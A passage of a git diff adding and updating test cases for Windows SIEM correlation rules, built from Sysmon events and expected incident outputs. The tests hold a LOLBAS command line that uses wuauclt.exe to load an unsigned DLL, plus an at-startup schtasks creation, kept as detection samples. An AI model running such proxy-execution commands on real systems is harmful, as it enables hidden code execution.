20:11:42.268\"},{\"Name\":\"ProcessGuid\",\"text\":\"{00247c92-09fe-5f86-0000-001051841401}\"},{\"Name\":\"ProcessId\",\"text\":\"1716\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\wuauclt.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\ProgramData\\\\Intel\\\\helpa.dll\"},{\"Name\":\"FileVersion\",\"text\":\"?\"},{\"Name\":\"Description\",\"text\":\"?\"},{\"Name\":\"Product\",\"text\":\"?\"},{\"Name\":\"Company\",\"text\":\"?\"},{\"Name\":\"OriginalFileName\",\"text\":\"?\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=AF7687063F8EE1C8FD57D1A5FE6FA4F28A53C434,MD5=6AB43126243BE72FF7D446D5A496AA76,SHA256=56C5AFF6AC04BDF86EDBC4F0D0F9581F250A4C97DD60FD1179F153AC20230920,IMPHASH=8DEF796746DD54062D5B3186EEF39356\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\programdata\\intel\\helpa.dll", "object.process.hash.imphash": "8DEF796746DD54062D5B3186EEF39356", "object.process.hash.md5": "6AB43126243BE72FF7D446D5A496AA76", "object.process.hash.sha1": "AF7687063F8EE1C8FD57D1A5FE6FA4F28A53C434", "object.process.hash.sha256": "56C5AFF6AC04BDF86EDBC4F0D0F9581F250A4C97DD60FD1179F153AC20230920", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "helpa.dll", "object.process.original_name": "?", "object.process.path": "c:\\programdata\\intel\\", "object.property": "signature status", "object.value": "not signed", "object.version": "?", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T13:57:45.353Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\wuauclt.exe", "subject.process.guid": "00247c92-09fe-5f86-0000-001051841401", "subject.process.id": "1716", "subject.process.name": "wuauclt.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-10-13T20:11:42.268Z", "type": "raw", "uuid": "0d97b86b-f82b-4c18-8d42-4c0ca5771038"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-10-13T20:11:42.2692242Z\"},\"EventRecordID\":\"2196441\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"5340\",\"ThreadID\":\"7092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"LAPTOP-JU4M3I0E\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-10-13 20:11:42.268\"},{\"Name\":\"ProcessGuid\",\"text\":\"{00247c92-09fe-5f86-0000-001051841401}\"},{\"Name\":\"ProcessId\",\"text\":\"1716\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\wuauclt.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\ProgramData\\\\Intel\\\\helpa.dll\"},{\"Name\":\"FileVersion\",\"text\":\"?\"},{\"Name\":\"Description\",\"text\":\"?\"},{\"Name\":\"Product\",\"text\":\"?\"},{\"Name\":\"Company\",\"text\":\"?\"},{\"Name\":\"OriginalFileName\",\"text\":\"?\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=AF7687063F8EE1C8FD57D1A5FE6FA4F28A53C434,MD5=6AB43126243BE72FF7D446D5A496AA76,SHA256=56C5AFF6AC04BDF86EDBC4F0D0F9581F250A4C97DD60FD1179F153AC20230920,IMPHASH=8DEF796746DD54062D5B3186EEF39356\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\programdata\\intel\\helpa.dll", "object.process.hash.imphash": "8DEF796746DD54062D5B3186EEF39356", "object.process.hash.md5": "6AB43126243BE72FF7D446D5A496AA76", "object.process.hash.sha1": "AF7687063F8EE1C8FD57D1A5FE6FA4F28A53C434", "object.process.hash.sha256": "56C5AFF6AC04BDF86EDBC4F0D0F9581F250A4C97DD60FD1179F153AC20230920", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "helpa.dll", "object.process.original_name": "?", "object.process.path": "c:\\programdata\\intel\\", "object.property": "signature status", "object.value": "not signed", "object.version": "?", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T13:57:45.354Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\wuauclt.exe", "subject.process.guid": "00247c92-09fe-5f86-0000-001051841401", "subject.process.id": "1716", "subject.process.name": "wuauclt.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-10-13T20:11:42.268Z", "type": "raw", "uuid": "63b9ed71-a0a7-4346-b8d1-40318fab1353"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"action": "start", "alert.key": "c:\\programdata\\intel\\helpa.dll", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Binary Proxy Execution", "correlation_name": "Detect_execution_imageload_wuauclt_lolbas", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "correlationengine", "importance": "high", "incident.aggregation.key": "Detect_execution_imageload_wuauclt_lolbas|laptop-ju4m3i0e||c:\\programdata\\intel\\helpa.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "module", "object.process.fullpath": "c:\\programdata\\intel\\helpa.dll", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "helpa.dll", "object.process.original_name": "?", "object.process.path": "c:\\programdata\\intel\\", "object.property": "signature status", "object.value": "not signed", "object.version": "?", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\wuauclt.exe", "subject.process.guid": "00247c92-09fe-5f86-0000-001051841401", "subject.process.id": "1716", "subject.process.name": "wuauclt.exe", "subject.process.path": "c:\\windows\\system32\\"} \ No newline at end of file +expect 1 {"action": "start", "alert.key": "c:\\programdata\\intel\\helpa.dll", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Binary Proxy Execution", "correlation_name": "Detect_execution_imageload_wuauclt_lolbas", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Detect_execution_imageload_wuauclt_lolbas|laptop-ju4m3i0e||c:\\programdata\\intel\\helpa.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "module", "object.process.fullpath": "c:\\programdata\\intel\\helpa.dll", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "helpa.dll", "object.process.original_name": "?", "object.process.path": "c:\\programdata\\intel\\", "object.property": "signature status", "object.value": "not signed", "object.version": "?", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\wuauclt.exe", "subject.process.guid": "00247c92-09fe-5f86-0000-001051841401", "subject.process.id": "1716", "subject.process.name": "wuauclt.exe", "subject.process.path": "c:\\windows\\system32\\"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_2.sc index d494102f..8e6bace8 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_2.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_2.sc @@ -1,4 +1,4 @@ {"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-10-13T20:11:42.2786722Z\"},\"EventRecordID\":\"2196442\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"5340\",\"ThreadID\":\"7092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"LAPTOP-JU4M3I0E\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-10-13 20:11:42.277\"},{\"Name\":\"ProcessGuid\",\"text\":\"{00247c92-09fe-5f86-0000-0010ac861401}\"},{\"Name\":\"ProcessId\",\"text\":\"6372\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.18362.449 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"Cmd.Exe\"},{\"Name\":\"CommandLine\",\"text\":\"c:\\\\windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\Windows\\\\System32\\\\\"},{\"Name\":\"User\",\"text\":\"LAPTOP-JU4M3I0E\\\\bouss\"},{\"Name\":\"LogonGuid\",\"text\":\"{00247c92-de70-5f85-0000-002059f80600}\"},{\"Name\":\"LogonId\",\"text\":\"0x6f859\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{00247c92-09fe-5f86-0000-001051841401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"1716\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wuauclt.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"wuauclt.exe /UpdateDeploymentProvider C:\\\\ProgramData\\\\Intel\\\\helpa.dll /RunHandlerComServer\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "00247c92-de70-5f85-0000-002059f80600", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "laptop-ju4m3i0e", "object.account.id": "synthetic:bouss@laptop-ju4m3i0e", "object.account.name": "bouss", "object.account.privileges": "Medium", "object.account.session_id": "456793", "object.process.cmdline": "c:\\windows\\system32\\cmd.exe", "object.process.cwd": "c:\\Windows\\System32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "00247c92-09fe-5f86-0000-0010ac861401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "D7AB69FAD18D4A643D84A271DFC0DBDF", "object.process.hash.sha1": "8DCA9749CD48D286950E7A9FA1088C937CBCCAD4", "object.process.hash.sha256": "FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5", "object.process.id": "6372", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\Intel\\helpa.dll /RunHandlerComServer", "object.process.parent.fullpath": "c:\\windows\\system32\\wuauclt.exe", "object.process.parent.guid": "00247c92-09fe-5f86-0000-001051841401", "object.process.parent.id": "1716", "object.process.parent.name": "wuauclt.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.18362.449 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T13:57:45.354Z", "status": "success", "subject": "account", "subject.account.domain": "laptop-ju4m3i0e", "subject.account.id": "synthetic:bouss@laptop-ju4m3i0e", "subject.account.name": "bouss", "subject.account.privileges": "Medium", "subject.account.session_id": "456793", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-10-13T20:11:42.277Z", "type": "raw", "uuid": "63b9ed71-a0a7-4346-b8d1-40318fab1353"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"action": "start", "alert.key": "wuauclt.exe /updatedeploymentprovider c:\\programdata\\intel\\helpa.dll /runhandlercomserver", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Binary Proxy Execution", "correlation_name": "Detect_execution_imageload_wuauclt_lolbas", "correlation_type": "incident", "datafield6": "00247c92-de70-5f85-0000-002059f80600", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "correlationengine", "importance": "high", "incident.aggregation.key": "Detect_execution_imageload_wuauclt_lolbas|laptop-ju4m3i0e|wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\Intel\\helpa.dll /RunHandlerComServer|c:\\windows\\system32\\cmd.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "laptop-ju4m3i0e", "object.account.id": "synthetic:bouss@laptop-ju4m3i0e", "object.account.name": "bouss", "object.account.session_id": "456793", "object.process.cmdline": "c:\\windows\\system32\\cmd.exe", "object.process.cwd": "c:\\Windows\\System32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "00247c92-09fe-5f86-0000-0010ac861401", "object.process.id": "6372", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\Intel\\helpa.dll /RunHandlerComServer", "object.process.parent.fullpath": "c:\\windows\\system32\\wuauclt.exe", "object.process.parent.guid": "00247c92-09fe-5f86-0000-001051841401", "object.process.parent.id": "1716", "object.process.parent.name": "wuauclt.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.18362.449 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "laptop-ju4m3i0e", "subject.account.id": "synthetic:bouss@laptop-ju4m3i0e", "subject.account.name": "bouss", "subject.account.privileges": "Medium", "subject.account.session_id": "456793"} \ No newline at end of file +expect 1 {"action": "start", "alert.key": "wuauclt.exe /updatedeploymentprovider c:\\programdata\\intel\\helpa.dll /runhandlercomserver", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Binary Proxy Execution", "correlation_name": "Detect_execution_imageload_wuauclt_lolbas", "correlation_type": "incident", "datafield6": "00247c92-de70-5f85-0000-002059f80600", "event_src.category": "Other", "event_src.fqdn": "laptop-ju4m3i0e", "event_src.host": "laptop-ju4m3i0e", "event_src.hostname": "laptop-ju4m3i0e", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Detect_execution_imageload_wuauclt_lolbas|laptop-ju4m3i0e|wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\Intel\\helpa.dll /RunHandlerComServer|c:\\windows\\system32\\cmd.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "laptop-ju4m3i0e", "object.account.id": "synthetic:bouss@laptop-ju4m3i0e", "object.account.name": "bouss", "object.account.session_id": "456793", "object.process.cmdline": "c:\\windows\\system32\\cmd.exe", "object.process.cwd": "c:\\Windows\\System32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "00247c92-09fe-5f86-0000-0010ac861401", "object.process.id": "6372", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "wuauclt.exe /UpdateDeploymentProvider C:\\ProgramData\\Intel\\helpa.dll /RunHandlerComServer", "object.process.parent.fullpath": "c:\\windows\\system32\\wuauclt.exe", "object.process.parent.guid": "00247c92-09fe-5f86-0000-001051841401", "object.process.parent.id": "1716", "object.process.parent.name": "wuauclt.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.18362.449 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "laptop-ju4m3i0e", "subject.account.id": "synthetic:bouss@laptop-ju4m3i0e", "subject.account.name": "bouss", "subject.account.privileges": "Medium", "subject.account.session_id": "456793"} \ No newline at end of file From 8d871739191f1cc4f4f0d65c95633067b2970644 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 10:27:59 +0300 Subject: [PATCH 33/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Schtasks?= =?UTF-8?q?=5FCommandline)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Schtasks_Commandline/tests/test_1.sc | 4 ++++ .../Schtasks_Commandline/tests/test_2.sc | 5 +++++ .../Schtasks_Commandline/tests/test_3.sc | 4 ++++ 3 files changed, 13 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_3.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_1.sc new file mode 100644 index 00000000..9d144753 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": "{ \"Event\": { \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\", \"System\": { \"Provider\": { \"Name\": \"Microsoft-Windows-Sysmon\", \"Guid\": \"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\" }, \"EventID\": \"1\", \"Version\": \"5\", \"Level\": \"4\", \"Task\": \"1\", \"Opcode\": \"0\", \"Keywords\": \"0x8000000000000000\", \"TimeCreated\": { \"SystemTime\": \"2021-08-16T13:16:24.2433848Z\" }, \"EventRecordID\": \"10277287\", \"Correlation\": null, \"Execution\": { \"ProcessID\": \"3548\", \"ThreadID\": \"4948\" }, \"Channel\": \"Microsoft-Windows-Sysmon/Operational\", \"Computer\": \"Test_w10x64-130.testlab.org\", \"Security\": { \"UserID\": \"S-1-5-18\" } }, \"EventData\": { \"Data\": [ { \"Name\": \"RuleName\" }, { \"text\": \"2021-08-16 13:16:24.239\", \"Name\": \"UtcTime\" }, { \"text\": \"{63310a87-6528-611a-0000-00106bb3f401}\", \"Name\": \"ProcessGuid\" }, { \"text\": \"8668\", \"Name\": \"ProcessId\" }, { \"text\": \"C:\\\\Windows\\\\System32\\\\schtasks.exe\", \"Name\": \"Image\" }, { \"text\": \"10.0.19041.906 (WinBuild.160101.0800)\", \"Name\": \"FileVersion\" }, { \"text\": \"Task Scheduler Configuration Tool\", \"Name\": \"Description\" }, { \"text\": \"Microsoft® Windows® Operating System\", \"Name\": \"Product\" }, { \"text\": \"Microsoft Corporation\", \"Name\": \"Company\" }, { \"text\": \"schtasks.exe\", \"Name\": \"OriginalFileName\" }, { \"text\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\schtasks.exe\\\" -create -tn test /sc Onstart\", \"Name\": \"CommandLine\" }, { \"text\": \"C:\\\\Users\\\\username\\\\Desktop\\\\\", \"Name\": \"CurrentDirectory\" }, { \"text\": \"TESTLAB\\\\username\", \"Name\": \"User\" }, { \"text\": \"{63310a87-5f74-611a-0000-00204f8fcc01}\", \"Name\": \"LogonGuid\" }, { \"text\": \"0x1cc8f4f\", \"Name\": \"LogonId\" }, { \"text\": \"2\", \"Name\": \"TerminalSessionId\" }, { \"text\": \"High\", \"Name\": \"IntegrityLevel\" }, { \"text\": \"MD5=796B784E98008854C27F4B18D287BA30,SHA256=356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B\", \"Name\": \"Hashes\" }, { \"text\": \"{63310a87-64dd-611a-0000-0010b515f401}\", \"Name\": \"ParentProcessGuid\" }, { \"text\": \"7148\", \"Name\": \"ParentProcessId\" }, { \"text\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\", \"Name\": \"ParentImage\" }, { \"text\": \"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \", \"Name\": \"ParentCommandLine\" } ] }, \"RenderingInfo\": { \"Culture\": \"en-US\", \"Message\": \"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2021-08-16 13:16:24.239\\r\\nProcessGuid: {63310a87-6528-611a-0000-00106bb3f401}\\r\\nProcessId: 8668\\r\\nImage: C:\\\\Windows\\\\System32\\\\schtasks.exe\\r\\nFileVersion: 10.0.19041.906 (WinBuild.160101.0800)\\r\\nDescription: Task Scheduler Configuration Tool\\r\\nProduct: Microsoft® Windows® Operating System\\r\\nCompany: Microsoft Corporation\\r\\nOriginalFileName: schtasks.exe\\r\\nCommandLine: \\\"C:\\\\WINDOWS\\\\system32\\\\schtasks.exe\\\" -create -tn test /sc Onstart\\r\\nCurrentDirectory: C:\\\\Users\\\\username\\\\Desktop\\\\\\r\\nUser: TESTLAB\\\\username\\r\\nLogonGuid: {63310a87-5f74-611a-0000-00204f8fcc01}\\r\\nLogonId: 0x1CC8F4F\\r\\nTerminalSessionId: 2\\r\\nIntegrityLevel: High\\r\\nHashes: MD5=796B784E98008854C27F4B18D287BA30,SHA256=356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B\\r\\nParentProcessGuid: {63310a87-64dd-611a-0000-0010b515f401}\\r\\nParentProcessId: 7148\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \", \"Level\": \"Information\", \"Task\": \"Process Create (rule: ProcessCreate)\", \"Opcode\": \"Info\", \"Channel\": null, \"Provider\": null, \"Keywords\": null } } }", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "63310a87-5f74-611a-0000-00204f8fcc01", "event_src.category": "Other", "event_src.fqdn": "test_w10x64-130.testlab.org", "event_src.host": "test_w10x64-130.testlab.org", "event_src.hostname": "test_w10x64-130", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "testlab", "object.account.id": "synthetic:username@testlab", "object.account.name": "username", "object.account.privileges": "High", "object.account.session_id": "30183247", "object.process.cmdline": "\"C:\\WINDOWS\\system32\\schtasks.exe\" -create -tn test /sc Onstart", "object.process.cwd": "C:\\Users\\username\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\schtasks.exe", "object.process.guid": "63310a87-6528-611a-0000-00106bb3f401", "object.process.hash.md5": "796B784E98008854C27F4B18D287BA30", "object.process.hash.sha256": "356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B", "object.process.id": "8668", "object.process.meta": "Description:Task Scheduler Configuration Tool | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "schtasks.exe", "object.process.original_name": "schtasks.exe", "object.process.parent.cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.guid": "63310a87-64dd-611a-0000-0010b515f401", "object.process.parent.id": "7148", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.19041.906 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2021-08-16T16:37:30Z", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:username@testlab", "subject.account.name": "username", "subject.account.privileges": "High", "subject.account.session_id": "30183247", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-08-16T13:16:24.239Z", "type": "raw", "uuid": "7fb070f5-9025-47dd-a392-21c8aecd2303"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "alert.context": "create the task: test|regex_match: schtasks.exe\" -create", "alert.key": "\"c:\\windows\\system32\\schtasks.exe\" -create -tn test /sc onstart", "category.generic": "Attack", "category.high": "Execution", "category.low": "Scheduled Task", "correlation_name": "Schtasks_Commandline", "correlation_type": "event", "datafield6": "63310a87-5f74-611a-0000-00204f8fcc01", "event_src.category": "Other", "event_src.fqdn": "test_w10x64-130.testlab.org", "event_src.host": "test_w10x64-130.testlab.org", "event_src.hostname": "test_w10x64-130", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": 